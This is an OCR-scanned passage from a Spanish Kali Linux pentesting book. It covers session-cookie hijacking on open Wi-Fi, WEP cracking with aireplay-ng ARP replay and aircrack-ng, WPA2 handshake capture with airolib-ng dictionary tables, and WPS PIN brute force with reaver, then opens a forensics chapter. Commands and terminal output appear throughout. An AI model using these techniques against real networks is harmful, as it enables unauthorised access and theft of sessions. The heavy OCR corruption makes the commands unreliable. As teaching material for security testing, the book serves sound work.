airodump-ng  -hssid  <mac  A  P>  —  channel  <  nit  mem  canat>  -w  <nomhre  ficbero  CAP>  monO , 
siendo  monO  la  inter faz  en  modo  monitor  Con  esta  instmccidn  se  esta  fijando  airodump-ng  a  un 
canal  cn  concrete  y  solo  se  estan  almacenando  paquetes  con  el  AF  indicado. 


Se  puede  decir  que  cn  este  instante  se  esta  reaiizando  un  Man  In  The  Middle*  gracius  a  que  el  medio 
de  transmision  es  el  aire,  y  se  esta  capturando  la  comuntcacioo  sin  cifrar  entre  un  cliente  asociado  a 
un  punto  de  acceso  y  este. 
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Imagen  06. 10.  Airodump-ng  capturando  el  tiifieo. 


I  Lira  poder  visualizar  la  captura  se  utiliza  el  analizador  de  trafieo  Wireshark  disponible  en  Kali  Linux. 
Este  sniffer  permitira  al  atacante  analizar  toda  la  informacion  obtenida  del  medio  de  transmision  y 
Poder  buscar  inlbrmacidn  sensible  o  importantc. 


El  filtro  aplicado  en  Mreshark  para  realizar  una  b  usque  da  rapida  es  http  contains  Cookie,  con  este 
filtro  se  mostrara  solamente  el  trafieo  HTTP  que  eontengan cookies.  En  la  imagen  se  puede  visualizar 
que  se  ha  detectado  una  cookie  interesante,  perteneciente  a  Facebook. 


Femes  ring  con  R  a/j 


Iniagen  06.3 1;  Obtentnm  de  Id  cookie  de  uji  servicio. 

Medtante  el  navegador  de  Kali  Linux  se  descarga  el  add  on  de  Cookies  Manager  +  eon  el  que  se 
inyectara  la  cookie  en  el  navegador.  Ahora  al  visitar  el  sitio  web  se  entrara  eon  la  sesion  del  cliente 
asociado  al  punto  de  acceso. 

El  tema  de  las  cookies  es  muy  aleatoric,  ya  que  generalmeme  no  se  sabe  de  que  usuario  o  persona  es 
una  cookie  hasta  que  no  se  entra  en  la  sesion. 
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Imagcm  06,12:  Inserdc'm  de  los  par.mietros  de  hi  cookie  en  el  plugin  cookies  manager  +. 


Hacking  WEP 

Cuando  la  red  es  de  tipo  WEP  o  incluso  WPA,  se  puede  realizar  el  mismo  procedi miento  que  en 
el  apartado  anterior.  El  union  ineonveniente  que  existe  es  que  el  tr&fico  entre  el  cliente  y  el  punto 
de  acceso  se  envia  ei  trade,  Si  el  usuario  malintencionado  emplea  tiempo  en  conseguir  la  clave 
de  acceso  a  la  red  o,  por  eualquier  otra  razon  ya  la  tiene,  puede  capturar  el  tr&fico  y  visual  izar, 
sin  necesidad  de  asoeiarse  al  punto  de  acceso.  Para  realizar  el  descifrado  de  paquetes  capturados 
mediante  el  uso  de  la  contrasena  de  la  red  Wi-Fi  se  debe  ulilizar  la  herramienta  airdecap-ng.  Esta 
utilidad  pertenece  a  la  suite  de  aircrack-ng. 


El  procedi  miento  para  realizar  hacking  WEP  es  el  siguiente: 

1 ,  ^Es  una  red  gerieriea  o  conoeida?  Es  decir,  si  la  red  es  de  un  operador  clasico,  se  debe  buscaf 
la  clave  por  defecto  de  dicha  red.  Es  sencillo  detectar  redes  de  operadores  genericos,  ya  que 
simplemente  por  el  SSJD  se  detec  tan. 


2  Si  la  red  no  es  generica  o  si  lo  es  pero  la  clave  ha  carnbiado.  se  debe  buscar  si  hay  un  cliente 
asociado  a  dicha  red.  En  caso  positive  sc  debe  realizar  un  ataque  AO  +  A3,  es  decir,  desautenticar 
al  cliente  asociado  con  aireptay-ng  y  realizar  la  reinyeccidn  de  paquetes  ARE  Este  ataque 
siempre  fimeiona,  y  los  resultados  son  bastante  r&pidos,  en  unos  5  minutes  se  crackea  la  clave. 


3.  Si  no  existe  un  cliente  asociado,  se  debe  probar  con  la  autenlicacidn  falsa,  ataque  AI+A3- 
Se  intenta  autenticar  en  el  punto  de  acceso,  siempre  y  cuando  este  lo  permits,  y  realizar  una 
reinyecc i on  de  paquetes  ARE 
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4.  Si  el  ataque  anterior  no  funciona  se  debe  probar  con  el  ataquc  de  ChopChop. 

5.  Si  ChopChop  o  Korek  no  funcionan,  se  debe  probar  con  un  ataque  de  fragmentation. 

Funcionamiento  WEP 

WEP  signifies  Wired  Equivalent  Privacy,  y  es  un  protocolo  que  no  ofrece  mucha  seguridad  en  una 
red  inalambrica,  ya  que  dicha  seguridad  esta  obsolete  y  se  conocen  diversas  man  eras  de  descifrar  el 
contenido  de  las  tramas  que  van  cifradas  con  WEP. 

Hay  que  diferenciarentre  la  autenticacion,  confidencialidad  e  integridad.  El  protocolo  WEP  no  ofrece 
una  capa  de  seguridad  en  ninguna  de  estas  3  lases .  En  primer  lugar  se  estudiara  la  autenticacion,  en 
la  cual  se  distinguen  dos  metodos: 

Open  System. 

Shared  Key. 

Open  System  deja  autenticarse  a  Lodos  los  clientes  en  el  punto  de  access  mientras  que  el  metodo  de 
autenticacion  Shared  Key  requiere  que  el  clieme  cnvie  un  mensaje  solicitando  conexiom  cl  punto  de 
acceso  contesta  con  un  desaflo,  el  cual  debe  ser  cifrado  por  el  cliente  y  reenviado  al  punto  de  acceso, 
si  este  puede  descifrarlo  la  autenticacion  es  valida. 

La  fase  de  confidencialidad  dispone  de  los  siguiemes  elementos: 

I  -  RC4*  Es  e)  algoritmo  utilizado  para  generar  el  key  stream,  el  cual  se  define  mas  adelante. 

W  -  IV  Vector  de  initialization,  son  la  parte  dinamica  de  los  key  stream.  Cada  tram  a  lleva  un 

IV  distinto,  siempre  que  se  pueda,  ya  que  son  generados  aleatoriamente.  El  IV  va  en  la  parte 
no  eifrada  de  la  trama  WER 

-  RC4  es  simetrico,  con  la  misma  clave  que  se  cifra  se  puede  descifrar. 

La  creatibn  del  kevstream  dispone  de  2  tases:  KSA  y  PRGA, 


fmagen  U6.13:  Esquema  de  funesonamLento  del  protocolo  WEP. 
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Rentes  ting  con  Kali 


En  la  imagen  sc  puede  visual  izar  el  proeeso  que  sc  lleva  a  cabo  para  formar  la  irama  WEP  qLle 
enviara,  ya  sea  del  AP  al  clients  o  del  cliente  al  AP.  La  shared  key  cs  estatica,  es  la  tipica  clave 
que  configure  el  duefio  de  la  red  en  el  punto  de  acceso,  o  en  casa  en  los  muter  Wi-Fi  la  tipica  de 
5  caracteres  o  10  hexadecimales,  o  la  de  13  caracteres  o  26  hcxadecimales,  Los  IV,  como  se  ha 
mencionado  anteriormente,  van  cambiando  aleatoriamente  en  cada  trama  enviada.  La  concatenation 
del  IV  y  la  clave  estilica  es  pasada  al  algoritmo  RC4  como  entrada,  la  salida  de  este  afgoritmo 
produce  el  keys  t  ream*  Este  keys  (ream  es  realmente  el  que  generara  el  cifrado  mediante  la  operation 
logics  XOR.  El  resultado  de  la  operation  logics  XOR  entre  el  key  stream  y  el  texto  piano  da  como 
resultado  la  parte  cifrada  de  la  trama  WEP.  Hay  que  hacer  un  inciso,  ya  que  la  integridad  se  calcula 
sobre  el  texto  piano,  mediante  el  1CV  como  se  puede  visuaLizar  en  la  imagen. 

Por  lo  que  se  puede  emender  que  A  XOR  B  XOR  B  =  A,  ^Que  se  quiere  decir  con  esto?  Cuando  el 
diente  genera  la  parte  cifrada  de  ia  trama  se  utiliza  un  key  stream  XOR  texto,  obteniendo  un  cifrado, 
Cuando  el  AP  reciba  dicha  trama,  este  le  apiica  el  mismo  keystream  XOR  cifrado  obteniendo  el 
texto,  en  otras  palabras  texto  XOR  keystream  XOR  keystream  =  texto. 

El  Keystream  se  erea  mediante  el  algoritmo  RC4,  el  cual  recibe  como  entrada  un  seed  o  semi  I  la,  que 
es  el  IVS  y  la  clave  estatica  '  I 

i,Que  prohlemas  tiene  WEP?  Por  el  uso  de  la  clave  estatica  se  pueden  real  izar  ataques  de  observation 
y  gracias  a  la  estadistiea  conseguir  sacar  e!  patrdn  dc  la  clave,  y  de  este  inodo  conseguir  la  clave 
estatica. 

El  IV  se  envia  siempre  en  piano,  por  In  que  son  captados  por  cualquiera,  ad  etnas  de  los  24  bits  de 
los  que  estan  compucstos  que  es  un  valor  demasiodo  corto.  Recolectando  un  numero  alto  de  I  Vs  se 
puede,  mediante  ataque  estadistico  deseifrar  la  clave,  La  autenticacion  se  realiza  del  AP  al  cliente, 
pero  no  del  cliente  al  AP,  por  lo  que  el  clients  no  sabe  realmente  si  se  conecta  al  AP  que  dice  ser.  Por 
esta  razon  existen  los  Rogue  AP,  o  MTTM  a  traves  de  un  AP, 


Proof  Of  Concept:  Hacking  WEP 

En  esta  prueba  de  concepto  se  estudiara  la  posibilidad  de  hackear  redes  con  cifrado  WEP  con 
henramientas  pertenecientes  a  Kali  Linux,  El  e  scenario  es  el  siguiente: 

Punto  de  acceso  con  clave  de  128  bits  con  cifrado  WER 

-  Cliente  asociado  a  dicho  punto  de  acceso, 

-  Atacante  con  la  distribucidn  Kali  Linux  y  tarjeta  Wireless  en  modo  monitor. 

I  n  primer  lugar,  y  como  se  ha  ido  realizando  en  las  anteriores  pruebas  de  concepto,  cl  atacante 
colocara  la  configuracidn  de  su  tarjeta  inalambriea  en  modo  monitor.  Con  la  herramienta  airoduwp* 
ng  el  atacante  comenzard  a  volcar  todo  el  trafico  que  hay  en  el  aire  en  la  pantalla  dc  su  equipo,  Eft 
este  punto  es  donde  cl  atacante  podra  detectar  que  existe  una  red  con  cifrado  WEP  y  que  ademas 
existe  un  cliente  asociado  a  dicha  red. 


Capitulo  VI.  A  toques  Wireless 
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Imogen  06.14:  Dcteocion  de  rtrd  WEPy  clieote  asodjido. 


C  omo  se  puede  visualizar  hay  un  clients  asociado,  lo  cual  hace  que  sea  mucho  mas  sencillo  realizar 
el  crackeo  de  la  clave  WEP  de  la  red.  Hay  que  reeordar  que  airodump-ng  debe  almacenar  en  una 
captura  CAP  el  trafico  que  circula  por  el  aire,  y  que  con  los  filtros  se  puede  aflnar  mas  la  captura. 
Para  llevar  a  cabo  el  ataque  se  debe  utilizar  la  herramienta  alreplay  eon  dos  objetivos  distintos,  el 
primero  desautenlicar  al  cliente  asociado  con  et  fin  de  que  vuelva  a  autenticarse  y  genere  un  paquete 
ARP  valido,  y  el  segundo  con  el  fin  de  capturar  el  paquete  AR  P  y  reinyectarlo  para  generar  un  gran 
volumen  de  paquetes  de  dates, 

t  Por  que  es  importante  generar  muchos  paquetes  de  dates?  Como  se  estudio  en  la  parte  teorica, 
es  importante  obtenei  gran  caniidad  de  lVs  para  poder  predecir  y  atacar  la  clave  que  descifran  los 
paquetes,  obtemendo  la  clave  de  la  red. 

raotfckat  I  aira play-ng“G  5  a  M  :22  :S0: 70:DE  :0E  -c  0G :  1C:BF:4D  monS 

15-  33:49  waiting  foi  boat  on  frame  (B5SID;  0ft  \22  :B0 :70  :Db  :BE)  on  channel  fi 
15:33:50  Sanding  64  ai  ratted  DoAuth.  STMAC:  [00: 1C  :BF  ;.4D:Q9 :0a]  f!Q4|B3  ACKs] ! 

15:33:51  Sanding  64  directed  DeAuth.  STMAC:  [00: 1C :BP :4D:0S:90]  197 | 84  ACKsJ 

15:33:51  Sanding  64  directed  DaAuthu  STMAC:  [ 80 : 1C ;9F : 40: OB: 00]  Ifi7|75  ACKs] 

15:33:52  Sanding  64  directed  DsAuth.  STMAC:  [ 00 : 1C :9F :4D : 08:001  t  7 | 63  ACKs] 

15:33:53  Sending  64  diractad  DeAuTh,  STM AC:  [ 00 : 1C: BF : 40:09:00 J  |  0 | 63  ACKs] 

^ ! 

Imagcn  06,15:  Desautenticacion  del  cliente  asociado  a  la  red  con  cjlrado  WEP. 


Para  lanzar  el  ataque  de  reinyeccion  se  debe  ejecutar  la  siguiente  instruction  aireplay-ng  -3  -b 
<direccion  MACAP>  -h  ^direction  cliente>  monO ,  siempre  y  cuando  monO  sea  la  interfaz  Wireless 
en  modo  monitor. 

rDotikali. I™-#  aireplay-ng  -3  -b  00:22 :SB :73:DE ;0£  -h  00  : 1C  :0F  : 43:00:00  mer=0 
The  interface  MAC  1 03:22  :BS:71 :1A  :ASS  doesn't  match  the  soecified  MAC  (-hj. 

ifeonfig  man®  hw  ether  00 :lC:BF;4D:0fl :B0 
15:32:41  Waiting  for  beacon  frame  (.BSSID:  00  :?2:B0 : 70 :0E:BE]  on  channel  6 
Sawing  ARP  requests  In  replay_arp -0403-153241 .cap 
You  should  also  start  airodump-ng  to  capture  replies. 

Notice:  got  a  deautn/disassoc  packet.  Is  the  source  MAC  associated  7 

Bead  13426  Packets  (got  2597  ARP  ^Quests  ana  3060  ACKs I .  sent  2521  packets  ..  [5G0  jpsl 

Imagen  06.16:  Reinyeccion  de  paquetes  ARP. 

Esia  reinyeccion  generara  gran  cantidad  de  datos  en  la  red  inalambrica,  provocando  en  algunos 
casos  saturacidn  del  AP.  A imdump-ng  mostrara  por  pantalla,  en  el  parimetro  #/s  que  hay  un  gran 
numero  de  paquetes  de  dalos  por  segundo,  y  en  el  campo  data  se  podra  visualizar  que  el  numero 
crece  a  gran  velocidad. 

En  la  imagen  se  puede  observar  como  el  numero  de  datos  ha  creeido  en  poco  tiempo  a  un  valor  alto. 
Se  espera  que  para  una  clave  WEP  de  128  bits  se  deban  capturar  unos  100,000  paquetes,  pero  esto 
puede  variar  y  no  es  fiable. 


Pen  testing  con  Kali 
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fmagen  06. !  7:  Crccimicoto  de  las  paquetes  do  dates. 


Lo  rccomendable  es  que  a  ta  vez  que  se  realiza  la  reinyeccion  con  airodump-ng,  en  otra  pestaila 
u  oira  shell,  se  esle  capturando  en  un  fichero  el  trafico  del  aire,  Pero  ademas,  se  puede  utilizar 
arrcrack-ng  a  la  vez  que  se  realiza  la  reinyeccion  para  ir  intentando  obtener  la  clave  del  fichero  CAP 
ta!  y  como  se  puede  visualizar  en  la  imagen. 


Airt  rack  -ng  l  .  ] 
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Imagen  06.18:  Crackeo  de  la  clave  WER 


Por  ultimo,  una  vez  que  se  tiene  la  clave  de  la  red,  si  no  se  quiere  autenticar  en  la  misma  para  evitar 
dejar  rastro  se  podria  utilizar  la  herramienta  airdecap-ng  para  descifrar  el  trafico  de  la  red.  Bn  otras 
palabras,  el  ataeante  puede  utilizar aimdump-ng para  capturar  el  trafico  del  aire,  el  dial  se  encuentra 
cifrado  con  WEP  y  utilizar  la  herramienta  airdecap-ng  para  conseguir  visualizar  la  informacibn  que 
viaja  por  el  aire,  gracias  a  que  anteriormente  se  ha  obtenido  la  clave, 

Este  hecho  se  denomina  MITM en  el  aire  y  sin  dejar  huella,  ya  que  no  hay  un  registro  de  la  tarjeta 
Wireless  en  ningun  lugar. 


Hacking  WPA  &  WPS 

WPA,  Wi-Fi  Protected  Access,  surge  como  una  solucibn  temporal  de  la  Wi-Fi  Alliance  para  securizar 
las  redes  Wireless  una  vez  que  quedo  de  manifiesto  la  debilidad  de  WEP,  Wired  Equivalent  Privacy* 
Ambus  soluciones,  WPA  y  WPA2,  soportan  ei  protocol©  802.  lx  para  la  autenticacion  en  ambitus 
empresariales  y  la  autenticacidn  mediant©  clave  compartida  PSK,  P re-Shared Key %  para  los  entomos 
SOI  l(  >,  Small  Office  and  Home  Office,  y  ambitos  domesticos. 

W  PA  y  WPA 2  se  diferencian  poco  eonceptualmente  y  difieren  principalmente  en  el  algoritmo  dc 
cifrado  que  emplean.  Mientraa  WPA  basa  el  cifrado  de  las  cotnunicaciones  en  el  uso  del  algoritmo 
TKIP  ( Temporary  Key  Integrity  Protocol),  que  esta  basado  en  RC4  al  igual  que  WEP.  WPA- 
utiliza  C  CMP.  (Counter-mode/CBC-MAC  Protocol)  basado  en  AES  i Advanced  Encryption  System 
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I  a  segunda  diterencia  notable  se  encuentra  en  el  algoritmo  utilizado  para  controlar  la  integridad 
del  mensaje.  Mientras  WPA  usa  una  version  menos  elaborada  para  la  generacion  del  codigo  MIC 
Message  Integrity  Code,  o  codigo  “Michael",  WPA2  im piemen ta  una  version  mcjorada  de  M l( 


La  diferencia  con  una  red  abierta  o  WEP,  es  que  el  punto  de  acceso  y  cliente  negocian  una  politics 
de  seguridad  a  seguir,  como  primera  fase  de  la  autenticacion.  Este  proceso  es  importance,  ya  que  el 
cliente  se  conecta  a  la  red  sin  que  haya  comenzado  el  proceso  de  autenticacion,  por  lo  que  el  trafico 
no  esta  siendo  cifrado  todavfa,  lo  que  permitiria  realizar  on  ataque  de  desautentieacion  o  conocido 
tambien  como  ataque  0,  que  provocaria  que  el  cliente  comenzase  un  nuevo  proceso  de  autenticacion 
y  asociacion,  En  la  fase  de  intercambio  de  claves  el  cliente  y  el  AP  utilizan  la  PSK  para  generar  un 
clave  llamada  PMK  (Pairwise  Master  Key).  Esta  PMK  es  una  derivada  cuando  el  sistema  es  WPA/ 
WPA2  empresarial  pero  es  la  misma  PSK  en  los  entomos  WPA/WPA2  PSK. 

Con  la  PMK  se  genera  una  clave  de  cifrado  para  cada  proceso  de  autenticacion  de  un  cliente  llamada 
PTK  que  basicamente  se  genera  a  partir  de  dos  numeros  aleatorios,  uno  de  el  Eos  generado  por  el 
cliente  y  el  otro  por  ei  punto  de  acceso  que  intercambian  para  obtener  ambos  la  misma  clave  PTK. 
Este  proceso  se  llama  4wvay- Handshake . 


Una  vez  que  e!  cliente  esta  autenticado,  el  protocolo  TKIP  utiliza  6  claves  de  cifrado  por  cada  scsion, 
4  de  ellas  son  utilizadas  para  comunicaciones  unicast  y  2  para  comunicaciones  multicast,  Estas 
claves  son  unicas  por  cliente  y  sesidn  y  se  cambian  periddicamente.  Estas  claves  se  gencran  a  partir 
de  derivadas  de  !as  direcciones  MAC,  ESSID  y  la  PTK, 


Un  atacante  que  quiera  vulnerar  una  red  WPA-PSK  va  a  tratar  de  capturar  ese  intercambio  de 
numeros  aleatorios,  para  una  vez  conocidos  estos,  junto  con  el  SSID  y  las  direct  iones  MAC  del 
cliente  y  el  punto  de  acceso  de  la  red  obtener  la  frase  o  secreto  com  parti  do  que  se  util  izo,  Una  vez 
que  el  atacante  tenga  la  clave  com  part  ida  se  podra  conectar  a  ta  red. 

WPS,  Wi-Fi  Protected  Setup  y  es  tin  esiandar  de  2007.  promo  vido  por  la  Wi-Fi  Alliance  para  facilitar 
al  usuario  domestico  la  configuracion  y  creation  de  redes  WLAN.  WPS  no  es  un  meeanismo  de 
seguridad  por  si  mismo,  sino  que  se  Irala  de  la  definition  de  diversos  mecanismos  para  facilitar  la 
configuration  de  una  red  WLAN  segura  con  el  protocolo  WTPA2.  Los  melodos  que  utiliza  WPS  son 
los  siguientes: 

-  PIN.  La  credencial  se  intercambia  despues  de  introducir  un  PIN,  Este  metodo  es  de  Eos 
mas  distribuidos  con  WPS  y  el  mas  inseguro. 

PRC\  La  generacion  e  intercambio  de  las  credenciales  oeurren  despues  de  que  el  usuario 
ejecute  una  action  flsica,  como  es  presionar  un  boton  ineluido  en  ei  dispositive. 

*  NFC,  Intercambio  de  credenciales  a  traves  de  conumieacidn  NFC, 

USB.  Las  credenciales  sc  transfieren  mediante  un  dispositive  de  memoria  flash. 

Proof  Of  Concept:  Hacking  WPA/WPA2 

I'.n  esta  prtieba  de  coneepto  se  estudiara  el  crackeo  de  una  red  con  cifrado  WPA.  EI  eseenario  es  el 
riguiente: 


IKK 
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-  Punto  de  acceso  con  ESSID  “LaWR”  y  con  cifrado  dc  tipo  WPA2  /  CC'MP. 

-  Cliente  asociado  a]  punio  de  acceso.  1  ■ 

-  El  atacante  dispone  de  la  distrihucion  Kali  Linux.  *9 

£n  primer  lugar  y  eomo  se  ha  realizado  en  las  pruebas  anteriores  se  debe  configurar  la  taijeta 
Wireless  en  modo  monitor  con  la  aplicacion  airmon-ng,  Despues,  airodump-ng  es  Is f ado  pari 
capturar  el  iralico  enlre  el  punto  de  acceso  y  el  cliente  asociado,  el  objetivo  en  este  easo  es  capturar 
el  handshake.  Si  cl  cliente  ya  se  encuentra  asociado  hay  que  realizar  un  ataque  de  desaittenticacion 
para  que  airodump-ng  pueda  capturar  el  handshake, 

En  la  imagen  se  puede  visual izar  eomo  tras  el  ataque  de  desautenticacion,  mediante  la  instruction 
aireplay  - 0  5  -a  -  direction  MAC  AP>  -c  <direccion  MAC  client e>  monO,  el  cliente  se  vuelve  a 
asociar  y  se  consigue  el  handshake. 
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Imagen  06.  C  aptura  del  handshake  dc  la  asociacidn  del  cliente  ctm  el  punio  de  acceso. 

Una  vez  que  sc  dispone  dc  tma  captura  con  el  handshake  en  ella,  se  prepara  una  base  dc  dalo$  ;i 
modo  de  rainbow  table  en  la  que  se  obtendran  PMKs  para  un  ESSID  en  concrete.  £C6mo  se  prepara 
esta  base  de  datos?  Airolib-ng  permite  al  usuario  realizar  esta  accion,  solamente  hay  que  detallar  1  os 
requisites: 

-  Ficbero  con  los  ESSTD  para  los  que  se  quieren  generar  las  PMKs,  j 

Fiehero  con  las  palabras  que  son  las  posibles  contrasehas  de  la  red,  es  decir,  un  diccionario. 
Es  recomendable  que  el  diccionario  sea  grande  y  con  el  mayor  numero  de  palabras. 

-  Para  cada  ESSID  se  generara  una  tabla  con  las  PMKs  precalculadas, 

Lo  explicado  anteriormente  es  similar  al  funcionamiento  de  las  rainbow  tables  para  crackear  hashes. 
En  la  imagen  se  puede  visual  izar  eomo  airolib-ng  trabaja. 

r 'A;- rpk.i  M  ■  airolib  ng  c rackwpa  -Import  pssswd  /root/passwd . txt 
fading  f  j.1  a  . .  . 

Writing, , .€B  read,  3E5G1  invalid  lines  ignored, 
ton*. 

■  ootfkal  l :  --#  acho  L#WR  >  /roQt/easid „txt 

r  r>o  t  id  N  <■  I  i :  -9  airolib-ng  crftckwpn  import  ossld  /root /ess  id.  txt 
fading  fils,  *. 

Writing. . . 

[June. 

r  fmtiik.il  (  :  -  f  airolib  -ng  creckwpa  ■  -slat* 

Ihore  nr*  1  ESSID*  and  l $  passwords  In  th*  database.  O  out  of  16  possible  combination*  have  bean  comput 
sd  1.0%)  . 

ESSID  Priority  Dona 

oWR  64  0.9 

rgotgkaLl>#J _ _  _  , 


Imagen  06.20:  Generacidn  dc  la  Rainbow  Table  dc  PMKs. 
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n30t§feaU  airolib-ng  crackwpa  --clean  all 
Deleting  invalid  ESSIDs  and  passwords*.. 

Delating  unreferenced  PWs... 

Analysing  index  structure.,. 

Vacuum -cleaning  the  database,  This  could  take  a  while,,. 

Checking  dot  abuse  integrity*,, 
imeg  nty_check 
ok 

Done , 

rcnjt(jkali:’#  airolib-ng  crnckwpa  --batch 

Computed  16  PMK  In  I  seconds  UG  PNK/s*  0  in  buffer).  All  E55ID  processed. 

rot>t(jko  1  ? :  M  airolib-ng  c^ackwpa  --verify  all 
Checking  all  PHKs.  This  could  take  a  while, ,, 

ESSID  PASSWORD  PMK  D0  CORRECT 


Imagen  06,21:  V@rifieaei6n  de  la  base  de  daios  creada  con  airolib-ng. 


Una  vcz  que  se  tiene  c  read  a  la  base  de  datos  se  debe  lanzar  aircrack  con  la  instruccion  aircrack-ng 
-r  -fie hero  DB>  <fichero  CAP>.  Aircrack-ng  comenzara  a  probar  las  PMKs  contra  el  trafico  de  la 
captura  y  devolviendo  la  clave  si  cn  alguna  de  las  claves  cs  valida. 
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Imagen  06.22;  Ctackeo  mas  tipi  do  que  con  diccionario  con  airolib-ng  y  aircrack-ng. 


Proof  Of  Concept:  Hacking  WPA2  con  WPS 

bn  esta  prueba  de  coneepto  se  comprobara  la  deteccion  de  WPS  y  como  este  puede  hacer  que  el 
hacking  a  WPA  sea  mucho  mas  rapido  de  la  que  podria  scr  con  una  clave  compleja  y  diccionario.  El 
^scenario  es  el  siguiente: 

-  Pimto  de  acceso  con  WPA2  y  WPS  active  y  vulnerable. 

No  se  requiere  de  un  diente  asoeiado  a  dicho  pumo  de  acceso, 

E!  atacante  utilizara  Kali  Linux,  y  en  concreto  la  herramienta  reaver  para  llevar  a  cabo  el 
ataque. 

l;l  atacante  uti lizard  Wireshark  para  detectar  WPS  active  en  una  red. 

*  °nio  siempre  se  debe  activar  el  modo  monitor  y  configurer  airodump-ng  para  capturar  el  trafico 
en  el  aire.  esta  vez  el  objetivo  es  obtener  una  mucstra  dc  los  beacons  de  inlbrmacion  de  los  puntos 
^  Acceso. 

Analizando  con  Wi reshark  los  paquetes  donde  los  puntos  de  acceso  indtean  su  SSID  se  puede  buscar 
en  el  apartado  tagged  el  campo  WPS,  En  el  instante  en  que  sc  encuentre  dicho  campo  se  puede 


19(1 


Pentesting  con  Kali 


afirmar  que  el  ptinto  de  acceso  esta  ulilizando  WPS,  El  siguiente  paso  es  probar  a  ver  si  dieho 
dispositive  es  vulnerable  a  la  fuerza  bruta  contra  d  PIN  que  se  pretende  realizar. 


I  »  1  "  1  "I 


Imagen  06,23:  Detecci6n  de  WPS  activo  en  un  muter. 


Por  ultimo,  una  vez  que  se  ha  deteetado  W PS  en  un  punto  de  acceso  se  prueba  mediante  la  herramienta 
reaver  si  dicho  punto  de  acceso  es  vulnerable.  La  herramienta  reaiizara  fuerza  bruta  sobre  el  punto 
de  acceso  enviando  distintos  PIN  hasta  eneontrar  el  que  le  devuelva  la  credential  de  la  red  con 
cifrado  WPA2,  B 


\\  PS  es  mm  comun  de  enemUrar  en  eiertos  ranters  de  proveedores  de  Internet,  asi  eorno  muten 
Wireless  mbdemos.  I  lay  que  tener  cuidado  con  las  configure  ion  es  por  defecto  ya  que  Os  las  pueden 
provocar  que  WPS  este  activo  y  el  responsable  del  punto  de  acceso  sea  consciente  de  ello. 

rcouakrtli  ;-#  reaver  monS  -b  30:4ii$A  ;7C :FE:B1  -c  II  TJ  vv 
leaver  vl,4  WiFi  Protacted  Setup  Attack  Tool. 

Copyright  ( c )  2611,  Tactical  Network  Solutions*  Craig  Heffner  « ha ffnarfltac not sol .cdrt> 

1+]  Waiting  for  beacon  from  30 :46 :9A :7C :FE :0I 

[+]  Associated  with  30 :46 :9A:7C :FE :01  fESSlD:  STccnico) 

[+3  0.B5*  complete  fl  2613-04-03  1H:5G:B4  1 18  seconds/oin] _ 

Imagcn  06.24:  Crackeo  de  PIN  con  reaver  y  posterior  obtencion  de  clave  de  la  red. 
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Capitulo  VII 
Forense  con  Kali 


1.  Introduction  al  analisis  forense 

La  definicion  de  analisis  y  analista  forense  no  es  realmente  sencilla.  Existen  gran  catitidad  de 
defintciones  que  en  general  induyen  a  la  persona  que  estudia  quo  ha  sueedido,  Como  ha  sueedido  y 
qiiien  lo  ha  realizado.  En  lineas  generales  el  analisis  forense  es  el  proceso  de  estudio  exhaustive  de 
an  sistema  del  quo  se  desea  conocer  su  historia.  En  dicho  sistema  se  sospecha,  o  induso  se  tiene  la 
eerleza,  de  que  se  ha  sido  victima  de  una  intrusion  o  ataque  contra  una  maquina  o  usuario  eoncreto. 
Las  vias  para  llevar  el  ataque  son  muy  variadas,  lo  que  conlleva  que  el  analisis  forense  se  pueda 
desglosar  en  disfintas  ramas: 

-  Anilisis  forense  de  sislemas  o  imdgenes. 

Analisis  forense  de  red, 

-  Analisis  forense  de  malware. 

-  Analisis  forense  de  RAM. 

-  Analisis  forense  de  mietadatos. 

El  objetivo  final  es  e!  mismo,  se  tome  la  via  que  se  tome,  lograr  evidencias  de  lo  que  ha  ocurrido, 
eomo  ha  sueedido  y  quien  lo  ha  realizado,  En  su  defecto.  si  no  se  pueden  lograr  las  evidencias.  se 
deberan  obtener  indicios  que  puedan  ser  utilizados.  Hay  que  tener  en  euenta  que  un  analisis  forense 
puede  ser  Ilevado  a  juicio  eomo  una  prueba,  por  lo  que  la  captura  de  evidencias  y  el  tratam lento  de 
las  pruehas  es  primordial,  ya  que  una  incorrecta  captura  de  estas  pueden  mvalidar  dieha  prueba, 

Existen  ciertos  aspectos  que  suelen  ser  de  urtilidad  en  una  investigation: 

['  -  Melodo  utilizado  por  d  atacante  para  entrar  a  I  sistema, 

-  Actividades  ilicitas  rcalizadas  por  el  atacante, 

f  -  Aleance  e  implieaciones  de  diehas  actividades, 

-  Backdoors  o  malware  imtalado  cn  el  sistema.- 

lo  que  se  puede  deducir  de  la  lista  anterior,  el  objetivo  es  inlentar  dar  el  maximo  de  respuestas 
posibles  para  que.  en  caso  de  existir  alguna  aceton  maliciosa  o  delictiva  por  parte  de  un  usuario,  se 
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pueda  tratar  e  incluso  den  unci  ar  dicha  aeeion.  En  algunas  ocasiones  el  an&lisis  forense  es  truiado 
como  un  arte  de  ingenieria,  Los  casos  tbrehses  se  aplican  en  terras  de  fraudes,  casos  civiles,  de|jios 
informatieos,  conectividad  corporativa  o  laboral,  etcetera. 

Segtrn  las  estadisticas  la  mayoria  de  los  ataques  se  prodncen  en  un  ambito  laboral  y  de  distinios 
organismos.  Ademas,  este  tipo  de  ataque  proviene  del  interior  de  estos,  y  generalmente  son  tapados 
por  la  imagen  de  la  empresa  u  organ ismo  de  cara  al  exterior.  Otro  foco  son  los  ataques  extemos 
ya  que  existen  gran  cantidad  de  tipos  de  ataque  extemos  que  se  basan  en  versiones  de  aplicaciones 
antiguas,  no  parcheadas*  vulnerables  en  eodigO,  etcetera. 

Los  incidentes  nas  eamunes  son  los  aceesas  no  autorizados.  por  ejemplo,  el  usuario  accede  a! 
sistema  al  cual  no  deberia  poder  acceder.  La  ejecucion  de  cddigo  malicioso  es  otro  de  los  incidentes 
mas  comunes,  por  ejemplo  la  ejecucion  de  rootkit.  Por  ultimo,  la  interrupcion  de  un  servieio  o 
utilizacion  no  autorizada  del  mismo  es  otro  de  los  incidentes  que  mas  se  encuentra  el  analista  Forense. 

Toda  investigacidn  requiere  de  la  busqueda  y  eaptura  de  evidencias.  La  evidencia  digital  es  toda 
aquella  mformacion  dectrouica  que  puede  aportar  algun  dato  para  un  analisis  forense  digital 
Algunos  ejemplos  de  evidencias  son: 

-  Fecha  del  ultimo  acceso  a  un  fichero  o  aplicacion, 

-  Un  registro  de  acceso  a  un  fichero, 

-  Una  cookie  do  navegacion  web  almacenada  en  un  disco  duro, 

-  El  uptime  del  sistema. 

-  Un  fichero  en  disco. 

-  Un  proceso  en  ejecucion. 

Un  disco  dura,  un pendrive  u  otro  dispositive  de  almacenamiento. 

